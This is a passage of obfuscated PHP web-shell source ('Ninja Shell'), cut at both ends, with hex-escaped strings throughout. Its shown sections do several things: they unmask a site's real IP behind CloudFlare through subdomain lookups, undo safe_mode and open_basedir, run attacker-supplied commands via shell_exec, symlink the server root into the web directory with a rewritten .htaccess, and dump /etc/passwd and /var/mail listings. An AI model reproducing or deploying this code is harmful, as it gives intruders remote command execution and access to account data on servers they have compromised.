"\12\x9\x9\x9\x9\xa\x9\x9\11\11\x3c\x66\x6f\x72\155\x20\155\x65\164\x68\x6f\144\x3d\42\120\x4f\123\124\42\x3e\x3c\142\162\x3e\x3c\x62\162\x3e\x3c\x63\x65\156\164\145\x72\76\74\150\x72\76\xa\11\x9\11\x9\74\x68\62\x3e\102\171\160\x61\x73\x73\40\103\x6c\x6f\x75\144\106\154\x61\x72\x65\40\116\x69\156\152\141\x20\x53\x68\145\154\x6c\74\57\x68\x32\76\xa\x9\11\11\x9\74\x64\151\166\x20\x63\x6c\141\x73\163\40\x3d\40\x22\x72\x6f\167\x20\x63\x6c\145\x61\x72\x66\151\170\x22\x3e\xa\x9\x9\11\x9\74\144\x69\x76\40\x63\154\141\x73\x73\75\40\x22\x63\157\154\x2d\x6d\x64\55\64\42\x3e\xa\11\11\x9\x9\74\x73\145\154\x65\x63\x74\40\x63\154\x61\x73\163\x3d\x22\x66\157\x72\155\55\143\157\156\x74\x72\157\154\x22\x20\156\141\x6d\x65\75\x22\x6b\x72\x7a\42\76\xa\x9\x9\x9\11\11\x3c\157\x70\164\151\157\x6e\76\146\164\160\74\x2f\157\160\164\151\x6f\x6e\76\12\11\11\11\11\x9\11\74\157\x70\x74\151\x6f\156\76\x64\151\x72\145\143\x74\x2d\x63\x6f\x6e\x6e\164\x65\143\x74\x3c\x2f\x6f\x70\x74\151\x6f\156\x3e\xa\11\x9\11\x9\x9\11\x9\74\x6f\x70\164\x69\x6f\x6e\76\x77\x65\x62\155\141\151\154\x3c\57\x6f\160\x74\151\157\156\76\12\x9\11\x9\11\11\11\11\11\x3c\x6f\x70\164\x69\157\x6e\76\143\x70\x61\156\x65\x6c\x3c\57\x6f\x70\x74\151\x6f\x6e\76\12\x9\x9\11\x9\x3c\x2f\x73\x65\x6c\x65\x63\x74\x3e\xa\x9\11\x9\11\x3c\x2f\144\151\166\76\xa\11\11\11\11\x3c\x64\x69\166\40\143\x6c\x61\163\x73\40\75\40\42\143\157\154\55\x6d\144\x2d\64\x22\76\xa\x9\x9\x9\x9\x3c\x69\x6e\160\165\164\40\x63\x6c\x61\163\x73\75\42\146\x6f\162\x6d\55\x63\x6f\156\x74\162\157\154\42\40\x74\x79\160\145\x3d\42\x74\145\170\x74\42\40\156\x61\155\x65\75\42\164\141\x72\x67\x65\164\42\x20\x76\x61\x6c\x75\x65\75\42\x75\x72\x6c\x22\76\12\x9\11\11\11\74\x2f\144\x69\166\x3e\12\11\x9\x9\11\x3c\x64\x69\x76\x20\143\x6c\x61\163\163\40\75\40\x22\x63\157\154\x2d\155\144\x2d\64\x22\x3e\xa\11\x9\11\11\74\151\156\160\x75\x74\x20\x63\154\141\163\x73\75\x22\x66\157\x72\155\55\143\157\x6e\x74\162\x6f\154\42\x20\164\171\x70\145\75\x22\163\x75\142\x6d\151\x74\x22\40\166\141\154\x75\145\x3d\x22\102\171\160\x61\x73\163\42\x3e\12\11\x9\x9\11\74\x2f\x64\x69\166\x3e\12\x9\x9\x9\11\x3c\x2f\x64\x69\x76\x3e\12\11\11\x9\x9\74\x2f\x63\x65\156\164\x65\x72\76\12\x9\11\11\11\74\150\x72\76\x3c\142\x72\76\xa\x9\x9\11\11\x3c\x2f\x66\x6f\162\155\76\xa\x9\x9\x9\11\12\11\11\11\11"; $target = $_POST["\164\141\162\147\145\x74"]; if ($_POST["\153\x72\172"] == "\x66\164\160") { $ftp = gethostbyname("\x66\x74\160\x2e" . "{$target}"); echo "\74\142\162\76\74\x70\x20\141\x6c\151\x67\156\x3d\x27\x63\x65\156\x74\145\162\x27\40\144\x69\162\x3d\x27\x6c\164\162\x27\76\x3c\x66\157\156\164\40\146\141\x63\145\75\x27\x54\141\x68\157\x6d\x61\47\40\x73\151\x7a\145\x3d\47\62\x27\40\x63\x6f\x6c\157\x72\x3d\47\x77\150\151\164\x65\x27\x3e\103\x6f\162\x72\x65\x63\x74\40\12\x9\11\11\x9\x69\160\x20\x69\x73\40\72\x20\74\57\146\x6f\156\x74\76\74\146\x6f\x6e\x74\x20\x66\141\x63\145\x3d\47\x54\x61\x68\157\155\x61\x27\40\163\x69\x7a\x65\x3d\x27\62\47\40\x63\x6f\154\157\x72\x3d\x27\43\x46\x36\x38\102\61\x46\x27\76{$ftp}\74\57\146\x6f\x6e\164\x3e\x3c\x2f\160\76"; } if ($_POST["\x6b\x72\x7a"] == "\144\x69\x72\145\x63\164\55\143\157\156\156\164\x65\143\164") { $direct = gethostbyname("\144\x69\x72\145\143\x74\55\143\157\156\156\145\143\x74\x2e" . "{$target}"); echo "\x3c\142\x72\x3e\74\160\40\x61\x6c\x69\x67\156\75\47\143\x65\x6e\164\145\x72\x27\40\x64\151\x72\75\x27\x6c\164\x72\x27\76\x3c\x66\x6f\156\164\x20\x66\141\143\x65\x3d\47\x54\141\150\157\x6d\x61\47\40\x73\151\172\145\75\47\62\47\40\143\x6f\154\x6f\162\x3d\47\x77\x68\151\164\x65\47\x3e\x43\x6f\162\162\x65\x63\x74\40\xa\x9\11\x9\11\151\x70\x20\x69\x73\40\x3a\x20\x3c\x2f\146\x6f\156\164\x3e\74\146\x6f\x6e\x74\40\146\x61\x63\x65\x3d\47\124\x61\150\157\155\141\47\x20\x73\x69\x7a\145\75\47\62\x27\40\x63\x6f\x6c\x6f\x72\x3d\x27\x23\106\x36\x38\102\x31\106\x27\76{$direct}\74\x2f\x66\157\x6e\x74\x3e\x3c\57\x70\76"; } if ($_POST["\x6b\x72\x7a"] == "\x77\145\x62\x6d\x61\x69\x6c") { $web = gethostbyname("\x77\145\142\x6d\x61\151\x6c\x2e" . "{$target}"); echo "\x3c\x62\162\x3e\x3c\160\x20\141\x6c\151\x67\x6e\x3d\47\143\145\x6e\x74\x65\x72\x27\x20\x64\x69\x72\x3d\47\154\164\x72\x27\x3e\74\146\157\x6e\x74\40\x66\x61\x63\x65\75\x27\124\x61\150\x6f\155\x61\x27\x20\163\x69\172\145\x3d\47\x32\x27\40\x63\x6f\154\x6f\x72\x3d\47\x77\x68\x69\164\x65\x27\x3e\x43\x6f\x72\162\145\x63\164\40\xa\11\x9\x9\x9\x69\160\40\151\163\x20\x3a\x20\74\x2f\146\x6f\156\164\76\x3c\x66\x6f\x6e\164\x20\x66\141\x63\145\x3d\x27\124\x61\x68\x6f\x6d\141\x27\x20\x73\x69\172\x65\75\x27\62\47\x20\143\157\x6c\157\x72\75\47\43\106\x36\70\x42\61\x46\x27\76{$web}\74\x2f\146\x6f\x6e\164\76\74\57\x70\76"; } if ($_POST["\153\x72\x7a"] == "\x63\160\x61\x6e\145\154") { $cpanel = gethostbyname("\143\160\x61\156\145\154\x2e" . "{$target}"); echo "\74\142\x72\76\x3c\x70\x20\141\x6c\x69\147\x6e\x3d\x27\143\x65\156\x74\145\x72\x27\x20\x64\x69\162\75\47\154\164\162\47\x3e\74\x66\157\x6e\164\x20\146\141\x63\x65\x3d\47\124\x61\150\157\x6d\x61\47\x20\163\x69\x7a\145\x3d\47\x32\x27\x20\143\157\154\157\162\75\x27\167\150\151\x74\x65\x27\76\103\x6f\x72\162\145\143\164\40\12\11\11\x9\11\151\x70\40\x69\x73\x20\72\40\74\57\x66\157\x6e\x74\x3e\74\146\157\x6e\x74\x20\146\141\x63\145\75\47\x54\141\x68\157\x6d\141\x27\x20\163\x69\x7a\145\75\47\62\x27\x20\143\x6f\x6c\x6f\162\x3d\x27\x23\106\x36\x38\x42\61\106\47\76{$cpanel}\74\57\146\x6f\x6e\164\76\74\x2f\160\76"; } } elseif (isset($_GET[hex("\x62\171\160\141\163\163\55\163\145\x72\x76\145\162")])) { $dir = path(); ?>
<form action="?dir=<?php echo $dir; ?>
&do=bypassserver" method="post">
<center /><br />
<hr>
<h2>Bypass Server Ninja Shell</h2><br>
<?php print "\xa\74\x66\x6f\x72\155\x20\x6d\145\164\x68\x6f\144\75\42\x50\x4f\123\124\x22\x20\x61\x63\x74\x69\157\156\75\x22\x22\76\x3c\x62\x72\x3e\74\143\x65\156\164\x65\x72\x3e\12\x3c\142\x3e\74\146\x6f\x6e\x74\x20\x63\157\x6c\157\162\x3d\167\150\151\x74\145\x3e\x3c\x62\x3e\74\x66\x6f\156\x74\40\x63\x6f\154\x6f\162\x3d\x22\142\154\141\143\x6b\42\76\103\157\155\x6d\141\156\x64\x20\x3c\57\146\x6f\156\164\76\74\x2f\146\x6f\156\x74\x3e\x3c\x2f\142\x3e\12\74\x64\x69\x76\40\143\154\x61\163\x73\40\75\x20\x22\x63\157\x6c\x2d\x6d\x64\x2d\x34\42\76\12\x3c\x69\156\160\x75\x74\x20\156\x61\155\145\x3d\42\142\141\142\141\x22\x20\x74\x79\160\145\75\42\x74\145\170\164\42\40\x63\x6c\141\163\163\x3d\42\x66\x6f\162\155\x2d\143\157\156\164\162\x6f\x6c\x22\40\163\164\x79\x6c\145\75\42\x77\x69\x64\x74\x68\72\62\x35\60\160\170\73\42\40\163\x69\x7a\x65\x3d\x22\63\64\x22\76\x26\x6e\x62\163\160\x3b\12\74\57\144\151\166\x3e\xa\x3c\x64\x69\166\40\x63\154\x61\x73\x73\x20\x3d\x20\x22\143\157\154\x2d\x6d\x64\x2d\x34\42\76\xa\74\151\x6e\x70\x75\x74\40\x74\171\160\x65\75\x22\163\x75\142\155\x69\164\x22\x20\x63\x6c\141\163\x73\75\x22\146\x6f\x72\x6d\x2d\x63\157\156\x74\x72\x6f\154\x22\x20\x76\x61\x6c\x75\x65\75\x22\105\x78\x65\143\x75\164\145\x21\42\40\x73\x74\x79\154\x65\x3d\x22\167\151\144\164\150\x3a\x33\x35\60\160\x78\73\x22\x3e\xa\x3c\142\x72\76\12\74\x2f\x64\151\x76\x3e\12\74\57\x66\x6f\x72\x6d\76\12\x3c\x66\157\x72\155\x20\x6d\145\x74\x68\157\x64\x3d\42\120\x4f\123\x54\42\x20\141\x63\x74\151\x6f\x6e\75\42\42\76\x3c\x73\164\162\157\x6e\147\76\74\x62\76\74\146\x6f\x6e\x74\x20\143\157\154\157\162\75\42\x62\x6c\x61\x63\153\42\76\115\145\156\165\40\102\x79\160\x61\x73\x73\74\57\x66\157\156\164\x3e\x3c\x2f\163\164\x72\157\x6e\147\76\xa\x3c\163\145\x6c\x65\x63\164\40\156\x61\x6d\x65\75\42\154\151\172\60\x22\40\163\151\x7a\x65\x3d\x22\61\42\x20\x63\x6c\141\163\163\x3d\42\x66\157\x72\155\x2d\x63\157\x6e\x74\162\x6f\x6c\x22\40\x73\164\x79\154\x65\75\42\x77\x69\x64\164\x68\72\62\x35\60\x70\170\x3b\x22\76\xa\74\x6f\x70\164\x69\157\156\x20\166\x61\x6c\x75\145\75\42\x63\141\x74\40\57\x65\164\143\x2f\160\x61\163\x73\x77\144\42\76\x2f\x65\164\x63\x2f\x70\x61\x73\163\x77\144\74\57\x6f\160\x74\151\x6f\156\x3e\12\74\x6f\160\164\x69\x6f\x6e\40\166\x61\154\165\x65\x3d\x22\x6e\x65\164\x73\164\x61\x74\40\x2d\x61\x6e\40\x7c\x20\147\x72\145\x70\40\55\151\40\x6c\151\x73\x74\x65\x6e\42\76\156\x65\164\163\x74\x61\164\x3c\57\157\x70\164\151\x6f\156\76\12\74\x6f\160\164\x69\157\156\x20\166\141\x6c\165\x65\x3d\42\x63\141\x74\x20\57\x76\x61\x72\57\x63\x70\x61\x6e\145\x6c\x2f\x61\x63\143\157\165\156\164\151\x6e\x67\x2e\154\157\x67\42\76\57\166\x61\162\57\143\x70\141\x6e\145\154\x2f\141\143\x63\x6f\165\156\164\151\156\x67\x2e\x6c\x6f\147\x3c\x2f\x6f\160\x74\x69\157\x6e\76\12\x3c\x6f\x70\x74\151\x6f\156\x20\166\141\154\x75\x65\x3d\42\143\141\x74\x20\57\x65\x74\x63\x2f\x73\171\x73\x6c\x6f\147\56\x63\x6f\156\146\x22\x3e\x2f\x65\164\x63\57\163\x79\163\154\157\147\x2e\143\x6f\156\x66\x3c\57\157\x70\x74\x69\157\156\x3e\12\x3c\157\x70\x74\151\x6f\156\40\x76\x61\154\165\145\x3d\x22\143\141\164\x20\57\x65\164\x63\x2f\x68\157\163\x74\x73\x22\x3e\57\145\164\143\57\150\x6f\163\x74\163\74\x2f\x6f\x70\164\151\157\x6e\x3e\12\x3c\x6f\160\x74\151\x6f\156\x20\x76\141\x6c\165\x65\x3d\42\x63\x61\x74\x20\x2f\145\164\x63\x2f\156\x61\x6d\x65\144\x2e\x63\157\x6e\x66\x22\x3e\57\145\x74\143\57\x6e\141\155\145\x64\x2e\143\157\156\146\x3c\57\157\160\x74\x69\x6f\156\76\xa\x3c\x6f\160\x74\x69\x6f\x6e\x20\166\141\x6c\x75\x65\75\42\143\x61\164\x20\x2f\x65\x74\x63\57\x68\164\x74\160\x64\57\143\157\156\146\57\x68\x74\164\x70\x64\x2e\x63\x6f\x6e\x66\x22\76\57\145\164\x63\57\150\164\164\x70\x64\x2f\143\157\x6e\x66\x2f\150\x74\x74\160\x64\56\x63\157\x6e\x66\74\57\157\160\164\151\x6f\156\x3e\xa\x3c\57\x73\145\x6c\x65\x63\x74\x3e\40\74\142\x72\76\x3c\x69\156\x70\165\x74\40\164\171\160\145\x3d\42\163\x75\142\155\x69\164\x22\40\143\x6c\x61\x73\163\75\42\x66\x6f\162\155\x2d\143\157\156\164\x72\x6f\154\42\40\x73\x74\x79\154\145\x3d\x22\167\151\144\x74\x68\x3a\63\65\x30\160\170\x3b\42\40\166\141\x6c\165\x65\x3d\x22\x42\x79\x70\x61\x73\x73\x21\x22\x3e\xa\74\x2f\146\157\x72\x6d\x3e\xa\74\150\x72\x3e\74\x62\162\x3e\74\x2f\143\x65\156\x74\x65\162\x3e\12"; ini_restore("\163\141\146\145\x5f\x6d\157\144\x65"); ini_restore("\157\x70\145\156\137\x62\141\163\145\144\151\x72"); $liz0 = shell_exec($_POST[baba]); $liz0zim = shell_exec($_POST[liz0]); $uid = shell_exec("\x69\144"); $server = shell_exec("\x75\156\141\155\x65\x20\x2d\141"); echo "\x3c\160\x72\x65\76\x3c\x68\x34\x3e"; echo $liz0; echo $liz0zim; echo "\x3c\x2f\150\64\76\74\57\160\x72\x65\76"; "\74\57\144\151\x76\76"; ?>
<?php } elseif (isset($_GET[hex("\142\171\160\x61\x73\x73\55\166\x68\x6f\x73\164")])) { echo "\x3c\150\x72\x3e\74\146\x6f\x72\x6d\40\155\x65\164\x68\x6f\x64\x3d\47\120\x4f\x53\124\x27\x20\141\x63\164\151\157\x6e\75\47\47\76"; echo "\74\x63\x65\156\x74\x65\162\76\74\142\162\x3e\74\x66\157\x6e\x74\x20\x73\x69\172\145\x3d\x27\x36\47\76\102\x79\x70\x61\x73\163\x20\x53\171\155\154\x69\x6e\x6b\x20\166\110\157\x73\x74\74\x2f\x66\157\x6e\x74\x3e\74\142\162\x3e\x3c\x62\162\76"; echo "\x3c\x63\x65\x6e\x74\x65\x72\76\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\47\163\x75\142\155\x69\164\47\40\166\x61\154\x75\145\75\47\x42\x79\160\141\163\163\40\151\164\47\x20\x6e\x61\x6d\x65\75\x27\x43\x6f\154\x69\x69\47\x20\143\x6c\x61\x73\x73\40\x3d\x20\x27\x66\x6f\x72\x6d\x2d\143\x6f\x6e\x74\162\157\154\47\x20\x73\x74\x79\x6c\145\x3d\x27\167\151\x64\164\x68\x3a\62\65\60\160\x78\x3b\x27\x3e\74\57\143\x65\x6e\164\x65\162\x3e"; if (isset($_POST["\103\x6f\154\151\x69"])) { system("\154\x6e\40\55\163\x20\57\40\105\170\157\x72\143\151\163\x6d\x31\63\63\67\x2e\x74\x78\164"); $fvckem = "\124\63\102\60\x61\x57\x39\x75\143\171\102\x4a\142\155\122\154\x65\x47\x56\x7a\x49\105\132\x76\142\107\170\x76\144\x31\x4e\65\x62\125\170\160\142\155\164\172\104\x51\x70\x45\141\x58\x4a\154\x59\x33\x52\166\x63\156\154\x4a\142\155\122\x6c\x65\x43\x42\172\x63\x33\116\x7a\x63\x33\115\165\x61\x48\x52\x74\104\x51\160\x42\x5a\x47\x52\125\x65\130\102\x6c\111\x48\122\64\x64\103\101\x75\143\x47\150\167\x44\121\160\102\x5a\x47\122\x49\131\x57\65\x6b\142\107\126\171\111\x48\122\x34\x64\x43\x41\165\143\107\150\167"; $file = fopen("\x2e\x68\164\141\x63\x63\x65\x73\x73", "\x77\53"); $write = fwrite($file, base64_decode($fvckem)); $Bok3p = symlink("\x2f", "\x45\x78\x6f\162\x63\151\163\155\61\x33\63\67\x2e\164\x78\x74"); $rt = "\x3c\142\162\76\x3c\x61\40\150\x72\145\146\75\105\170\x6f\x72\143\151\163\155\x31\63\x33\x37\x2e\164\170\x74\40\124\101\x52\x47\x45\x54\75\47\137\142\x6c\x61\x6e\x6b\47\x3e\74\x66\157\156\164\40\143\157\154\x6f\x72\x3d\43\146\146\60\x30\60\60\40\163\x69\x7a\x65\75\x32\x20\x66\141\143\145\x3d\47\x43\x6f\x75\162\151\x65\x72\x20\116\145\x77\47\x3e\74\142\76\xa\11\x42\x79\160\x61\x73\x73\x65\x64\40\123\x75\143\x63\145\x73\x73\146\x75\154\x6c\171\74\x2f\x62\76\74\57\x66\157\x6e\164\x3e\74\57\141\76"; echo "\74\142\162\x3e\x3c\x62\162\76\x3c\x62\76\104\x6f\156\145\x2e\56\40\x21\74\57\x62\x3e\x3c\x62\x72\76\x3c\x62\x72\x3e\x43\x68\x65\x63\153\x20\154\x69\156\x6b\40\147\x69\166\145\x6e\x20\x62\x65\154\x6f\x77\x20\146\157\162\40\57\40\x66\x6f\x6c\x64\x65\x72\40\x73\x79\155\x6c\x69\x6e\153\40\74\142\162\76{$rt}\x3c\57\143\x65\x6e\164\x65\x72\x3e"; } echo "\74\57\146\157\x72\x6d\76\x3c\x68\x72\x3e\74\142\162\76"; } elseif (isset($_GET[hex("\142\171\160\141\x73\x73\x2d\x70\141\163\163\x77\x64")])) { echo "\x3c\150\162\x3e\74\x63\x65\156\164\145\x72\76\74\x68\x32\x3e\102\x79\160\141\x73\163\40\105\164\143\x2f\120\x61\x73\163\167\144\x20\74\x2f\150\x32\x3e\74\142\x72\x3e\12\74\164\141\x62\x6c\x65\40\x73\164\x79\x6c\145\75\42\x77\151\x64\x74\x68\72\x35\60\x25\42\x3e\12\x20\40\74\164\x72\76\12\x20\x20\40\40\74\164\144\x3e\x3c\146\x6f\x72\x6d\40\155\145\x74\150\x6f\x64\x3d\x22\160\x6f\163\164\x22\76\74\151\x6e\x70\x75\164\x20\x74\171\x70\145\75\42\x73\165\x62\x6d\x69\164\42\x20\x63\154\141\163\x73\40\x3d\40\42\146\157\162\x6d\55\143\x6f\156\164\162\x6f\x6c\x22\40\166\141\154\x75\x65\75\x22\123\171\x73\164\145\x6d\40\106\165\x6e\x63\164\x69\x6f\x6e\42\40\x6e\141\155\145\x3d\x22\x73\171\163\164\x22\x3e\x3c\x2f\146\x6f\x72\x6d\76\x3c\57\164\144\76\12\x20\x20\x20\x20\74\x74\144\76\74\x66\x6f\x72\155\x20\x6d\x65\x74\x68\x6f\144\x3d\42\160\x6f\x73\x74\x22\x3e\x3c\151\x6e\160\165\164\x20\164\x79\x70\x65\x3d\x22\163\x75\142\155\x69\x74\x22\x20\x63\154\141\163\163\40\75\x20\42\x66\x6f\162\x6d\55\143\157\x6e\164\162\157\154\x22\x20\166\141\x6c\165\145\x3d\42\x50\x61\x73\x73\x74\x68\162\165\40\106\x75\x6e\143\x74\x69\x6f\x6e\42\x20\156\141\155\145\x3d\42\160\141\163\163\x74\x68\x22\x3e\x3c\x2f\146\x6f\x72\155\76\x3c\57\x74\x64\76\xa\40\x20\40\40\74\164\144\x3e\x3c\146\157\162\x6d\40\155\145\164\x68\x6f\144\x3d\42\x70\157\163\x74\42\x3e\74\151\156\160\165\x74\40\x74\171\x70\145\75\x22\163\165\x62\155\x69\x74\42\40\x63\154\141\163\x73\x20\75\x20\42\x66\157\x72\155\x2d\143\x6f\156\x74\162\x6f\x6c\42\x20\166\x61\x6c\x75\x65\x3d\42\105\170\145\x63\x20\106\165\156\143\x74\x69\x6f\156\42\40\156\141\x6d\x65\x3d\42\145\170\42\76\74\x2f\146\x6f\x72\155\x3e\74\57\x74\x64\76\x9\12\40\x20\40\40\74\164\144\x3e\x3c\146\157\x72\155\x20\155\x65\x74\x68\157\x64\x3d\42\x70\157\163\x74\42\76\x3c\151\156\x70\x75\x74\40\164\x79\160\145\75\42\x73\x75\x62\x6d\151\164\x22\x20\143\x6c\141\163\x73\40\75\40\42\x66\157\162\155\x2d\143\157\x6e\x74\162\x6f\x6c\x22\40\x76\x61\x6c\x75\x65\75\x22\123\x68\x65\x6c\154\x5f\145\170\x65\x63\40\x46\x75\x6e\x63\x74\x69\x6f\x6e\42\40\x6e\141\x6d\145\x3d\42\163\x68\145\170\x22\x3e\x3c\x2f\x66\157\162\x6d\x3e\74\57\x74\x64\x3e\11\x9\xa\40\40\x20\40\74\x74\x64\76\x3c\146\x6f\x72\x6d\x20\x6d\145\164\x68\157\144\75\x22\x70\x6f\163\164\42\x3e\74\151\x6e\x70\165\164\40\x74\x79\x70\145\75\42\x73\165\142\155\x69\164\x22\x20\x63\154\x61\x73\163\40\x3d\x20\x22\146\x6f\162\155\55\143\x6f\156\x74\162\x6f\x6c\42\40\166\141\x6c\165\x65\x3d\x22\120\157\163\x69\x78\x5f\x67\145\x74\160\167\x75\151\144\x20\106\x75\x6e\x63\x74\151\x6f\x6e\42\40\156\141\x6d\x65\x3d\42\155\x65\154\145\x78\42\x3e\x3c\x2f\x66\x6f\162\x6d\x3e\x3c\x2f\164\144\76\xa\x3c\x2f\x74\162\76\74\x2f\x74\141\x62\x6c\x65\76\xa\74\x62\162\76\x3c\150\162\76\12\x3c\150\62\x3e\102\x79\x70\x61\163\x73\x20\x55\x73\145\x72\74\57\x68\x32\76\x3c\164\141\142\x6c\x65\40\163\x74\171\154\x65\x3d\42\x77\151\x64\x74\x68\72\x35\60\x25\42\x3e\74\x62\162\76\xa\x3c\x74\x72\x3e\xa\x20\x20\40\x20\x3c\x74\x64\x3e\74\x66\x6f\162\x6d\x20\x6d\145\x74\150\157\144\75\x22\x70\157\x73\x74\42\x3e\x3c\x69\156\160\x75\x74\40\164\171\160\145\75\42\x73\165\x62\x6d\151\164\x22\40\x63\x6c\141\x73\163\40\75\x20\x22\146\157\162\155\55\x63\157\x6e\164\x72\x6f\x6c\42\x20\166\x61\154\165\x65\x3d\42\x41\167\x6b\40\120\162\x6f\x67\x72\x61\x6d\42\40\156\141\155\145\x3d\x22\141\167\153\165\x73\x65\162\x22\x3e\x3c\x2f\146\157\162\x6d\76\74\x2f\164\144\x3e\12\x20\40\40\x20\74\x74\x64\x3e\x3c\146\157\x72\x6d\x20\155\x65\x74\x68\x6f\144\x3d\42\160\157\163\164\42\76\74\151\x6e\x70\x75\x74\40\164\x79\160\145\75\42\x73\x75\142\x6d\151\164\x22\x20\143\x6c\141\163\163\40\75\x20\42\x66\157\162\x6d\x2d\x63\157\x6e\x74\162\x6f\154\x22\x20\x76\141\x6c\x75\145\75\x22\123\171\163\164\145\155\x20\x46\165\x6e\x63\x74\x69\x6f\x6e\x22\40\x6e\x61\x6d\x65\75\42\163\x79\x73\x74\x75\x73\145\162\x22\x3e\74\x2f\x66\157\x72\155\x3e\74\57\x74\x64\x3e\12\40\x20\x20\40\x3c\x74\144\76\74\146\x6f\x72\155\40\x6d\145\x74\150\157\x64\x3d\x22\160\157\x73\x74\x22\x3e\x3c\x69\156\x70\165\x74\40\x74\171\160\x65\75\x22\163\x75\x62\x6d\151\x74\x22\40\x63\154\141\x73\x73\x20\75\40\42\146\157\x72\x6d\55\x63\x6f\156\x74\162\x6f\x6c\x22\40\166\x61\154\165\x65\x3d\x22\120\x61\163\x73\164\150\x72\x75\40\106\165\x6e\143\164\151\157\x6e\42\40\x6e\141\x6d\145\x3d\42\160\x61\163\163\x74\150\165\163\x65\162\42\76\x3c\x2f\146\157\x72\155\x3e\74\57\164\x64\x3e\11\12\x20\x20\x20\x20\74\164\x64\76\74\x66\x6f\162\x6d\40\155\145\x74\x68\157\x64\75\x22\x70\x6f\163\x74\x22\76\x3c\x69\156\x70\x75\164\x20\x74\x79\160\x65\75\x22\x73\165\142\x6d\x69\164\x22\40\143\x6c\x61\163\163\x20\x3d\x20\42\x66\x6f\162\155\55\x63\x6f\x6e\x74\162\x6f\x6c\42\40\x76\141\x6c\x75\x65\x3d\42\105\170\145\143\x20\x46\165\156\x63\x74\151\x6f\x6e\x22\x20\156\x61\x6d\145\x3d\x22\x65\170\165\x73\x65\162\x22\76\x3c\57\146\x6f\x72\x6d\x3e\74\57\x74\144\x3e\11\x9\12\40\40\40\x20\x3c\164\x64\x3e\74\x66\157\162\155\40\x6d\x65\x74\x68\157\x64\x3d\42\160\x6f\x73\x74\42\76\x3c\x69\156\x70\x75\164\40\x74\x79\160\x65\x3d\x22\163\165\142\x6d\x69\x74\x22\x20\143\x6c\x61\x73\163\x20\x3d\40\x22\146\157\x72\x6d\55\143\157\156\x74\162\x6f\x6c\x22\x20\166\141\154\x75\x65\x3d\42\x53\150\145\154\x6c\x5f\145\170\x65\x63\40\106\x75\x6e\143\x74\x69\157\156\x22\x20\x6e\141\155\x65\x3d\42\163\150\x65\x78\x75\x73\x65\x72\x22\x3e\74\57\146\x6f\162\155\x3e\x3c\x2f\x74\144\x3e\12\x3c\57\x74\x72\x3e\12\74\x2f\x74\x61\x62\x6c\x65\76\x3c\x62\x72\76\74\x68\x72\x3e"; if ($_POST["\x61\167\x6b\x75\163\x65\162"]) { echo "\74\164\x65\x78\164\x61\x72\x65\x61\x20\x63\154\x61\x73\x73\x3d\47\146\x6f\162\x6d\x2d\x63\157\x6e\164\162\x6f\154\x27\40\143\157\x6c\x73\x3d\47\66\65\47\40\162\x6f\x77\163\75\47\61\65\x27\x3e"; echo shell_exec("\141\x77\x6b\x20\55\106\72\x20\x27\173\40\160\162\151\x6e\x74\x20\x24\x31\40\175\47\x20\57\145\x74\143\57\x70\141\x73\163\x77\144\40\x7c\40\163\x6f\x72\164"); echo "\x3c\x2f\x74\x65\170\164\x61\162\145\141\x3e\x3c\142\162\x3e"; } if ($_POST["\163\x79\163\x74\x75\163\145\162"]) { echo "\74\164\x65\170\x74\x61\x72\145\x61\40\143\154\x61\x73\x73\x3d\47\146\157\162\155\x2d\x63\157\156\x74\162\x6f\154\47\40\x63\157\x6c\x73\75\47\66\65\47\40\x72\157\167\163\x3d\x27\x31\65\47\x3e"; echo system("\x6c\163\x20\57\x76\141\x72\57\155\x61\x69\154"); echo "\74\x2f\164\x65\170\x74\x61\162\145\141\x3e\74\142\x72\x3e"; } if ($_POST["\160\x61\x73\163\164\x68\165\x73\145\x72"]) { echo "\74\164\x65\x78\x74\141\x72\145\x61\40\x63\x6c\141\163\x73\75\x27\x66\x6f\162\x6d\55\x63\x6f\156\164\x72\157\154\47\40\x63\157\154\x73\x3d\47\x36\x35\47\40\162\x6f\167\163\x3d\47\x31\65\47\x3e"; echo passthru("\x6c\163\x20\x2f\x76\x61\162\57\155\141\151\x6c"); echo "\x3c\57\x74\145\x78\164\141\162\x65\141\76\x3c\142\x72\76"; } if ($_POST["\145\x78\x75\163\x65\x72"]) { echo "\74\164\145\170\x74\141\x72\145\x61\40\x63\154\x61\x73\x73\75\x27\x66\x6f\162\155\55\x63\x6f\156\164\x72\157\x6c\47\40\143\157\154\x73\75\47\x36\65\x27\x20\162\x6f\x77\x73\75\47\x31\65\47\x3e"; echo exec("\154\163\x20\x2f\x76\x61\162\x2f\x6d\x61\x69\x6c"); echo "\x3c\x2f\x74\x65\x78\164\x61\x72\x65\141\x3e\x3c\x62\162\76"; } if ($_POST["\x73\150\x65\170\x75\x73\x65\x72"]) { echo "\x3c\x74\145\x78\x74\x61\x72\x65\141\x20\143\x6c\x61\163\x73\75\47\x66\157\162\x6d\x2d\143\157\156\x74\x72\x6f\154\47\x20\143\157\x6c\163\75\47\66\x35\x27\40\x72\157\167\x73\75\47\x31\65\47\x3e"; echo shell_exec("\x6c\x73\40\57\x76\141\162\57\x6d\x61\151\x6c"); echo "\x3c\57\164\x65\170\164\x61\x72\145\141\x3e\x3c\x62\x72\76"; } if ($_POST["\163\x79\x73\164"]) { echo "\74\164\145\x78\x74\x61\x72\145\141\x20\143\x6c\x61\x73\x73\75\47\x66\157\162\155\55\x63\x6f\x6e\164\162\157\x6c\47\40\x63\x6f\x6c\x73\75\47\66\65\47\x20\162\157\x77\x73\x3d\47\x31\65\x27\x3e"; echo system("\x63\141\x74\40\57\x65\164\143\x2f\x70\141\x73\x73\x77\144"); echo "\x3c\x2f\164\145\x78\164\x61\162\x65\141\76\74\142\x72\x3e\x3c\x62\x72\76\x3c\x62\76\x3c\x2f\x62\76\74\x62\162\x3e"; } if ($_POST["\x70\141\x73\x73\x74\150"]) { echo "\x3c\164\145\x78\x74\141\x72\x65\x61\40\143\x6c\x61\163\x73\75\x27\x66\157\x72\155\55\143\157\156\x74\x72\157\154\47\x20\x63\x6f\x6c\x73\x3d\47\x36\x35\47\x20\x72\157\167\x73\x3d\47\x31\x35\x27\76"; echo passthru("\x63\x61\x74\40\57\145\x74\x63\x2f\160\x61\163\163\167\x64"); echo "\74\57\x74\145\170\164\x61\x72\x65\141\x3e\74\x62\x72\76\74\142\x72\76\74\142\76\74\x2f\142\76\x3c\142\162\x3e"; } if ($_POST["\x65\170"]) { echo 